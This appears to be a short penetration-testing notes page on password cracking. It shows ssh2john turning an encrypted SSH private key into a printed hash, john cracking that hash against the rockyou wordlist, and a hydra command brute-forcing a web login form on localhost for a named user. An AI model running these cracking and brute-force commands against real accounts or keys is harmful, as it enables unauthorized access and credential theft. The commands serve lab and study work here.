Cracking Passwords

Crack ssh private key hashes with john

locate ssh2john

/usr/share/john/ssh2john.py id_rsa.bak

id_rsa.bak:$sshng$1$16$8D55B7449F8965162DA3B7F2F017FC21$1200$da5235b60485eb5323160d84af6d865abf6122625bb99d35239e7ac85a0b006363ffde590761fc12bf6ef307cc82bf33b81f18bb0d8698ed23260b90e022b7ea40cb4ff8691b9016e567c7012cde3c7c79f0e97686b1fed9ee480282307159a26c5377cc86180b39e7e9b22f45aab092ec5a0f4d441bc20fc6002f9b436bdec3f9dfdc278299727fbffec6abcfc93d7c8d3d39f0510c3c599e6fe57430773394d58e5bac2b1a7c5001e6b638df88530892b135522efe102c655617c2dcb9a972b78fb82abe3b81d971461f4770d0f3b5f233b6298c746a7c01d579cf82832b22fa15455f999a82da7c616c550ab45ee4b2eeea1c6a55f69f4f920971fbfad4abd35e89f15c446ae1b0e59cb545e6589ec16e6aea160c35f97f2e8ba03fbadb4447c8446e5238a1b7df2e7183ac03b8c2e1feaad036a1e970c2397f271caac1b187e111805bfe00b1ea83cd0e91a5f8104aaf3004f6f930ca7664a133125f2a7167304b51421b3fd53c7a67118c1fa4595c275929aa4893e6098dac315ab8dd66ba97924bb4f98807871e6b246c725f34d48662349b4d1cc248596adaf08d5c6b5eee3b5adf860256e70d1c121447fdb218bae6dc299560fae3770d22af00edfae7a93df5324102e14aa89975bc868a58e551e8a3e7ecc96b1eed3a3941063052634acc470886f051831016d2983664df4a81dd06fd4d071aa9ef568bf96216ec55c9f6ee922196d9beb92466dded1d6a561ea92b0e07777e621a656c9267bb7afb12ba910c3aef5f2ac240908ad04f169da54f301b6c24a7435333b7e1ddabad4c318aa2b4573978fe715eb37a18d7518c944deb1330387d1145661ee8b1bc8157f15df0e7ad81576f26bab072b7b23eb9bbe66718ef879d67ce93896b883ad6d9e3ff83826e114210ae27b04c61d074b5d5678302fb9e0dab8b9365a08b0ff3ff2cacb2bb213e25defefc581852651de9720da512c2976b674006cf052eb4dd2b3ab877c92eb24c31f6ada2d26bbeb27b56f17beae1d90fe2121cea6b545b5ab83b7c0fb914944b01975895aaa512c56df359f0e267410a98c46d4975f5e805c48aa88020229455af9d94387f5d893e69349a47bce22770efaf927417a87f5f201a24779969f7232a052d169c32ce4de33acd0573860955735c2a28f3c8a8630d48f753b9edcd2f6f1f12e3449b21ebd4a6ba617f7553665cab471c36001fd1cdc9571cdfdf11ec2cb7699ac5ab83fb7d8aae6d6ebd3702364dc236b7bb3703dbead074ad8dd1dc4ee1d92fcc2add1879929b14598bc27a241eacd223cb88cbcc2b3e3e87f51fb0c53d3efca3f28b72fb2486cf6abb073b87e5071d6c3025258e548d5bfdc9d800cfed0280e40ca355cb086e9fda5f2789282b60951738625f261260aba1eeb5a420ced269dab56c4563dff3e95442eb5b233b84f5c5870615295579700db8df13611f26532bebb86f0ea0d43ae51be0c520913f315ee04026c665c8438a435b9f4b48eecf9cf763b0637c798ef14e71b9e74f4360ae85a140b44fc863a7fc11f6e70a0c3a90a17a5604cf5c33920f96d1bec0094fdfd11b18c8a79ea82a0dacd6024ff048aa3889e18b9d670d3917bb4e2dbdf6d2260b2d25f332562020db1fb6d2318c953e5581ae0501590eb1148e7988a7618e195075b959234e03a126ad84a15ef8a8636fc6e2

it returns a sshhash that we can crack with john

Let's output this file

❯ /usr/share/john/ssh2john.py id_rsa.bak > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Cracking passwords with hydra

syntax

hydra -l harvey -P passv2.txt 127.0.0.1 http-post-form "/simple_chat/login_form.php:uname=^USER^&passwd=^PASS^&submit=Login:Password"

Previouscracking kdbx(keepass)NextGenerating a custom password list

Last updated 2 years ago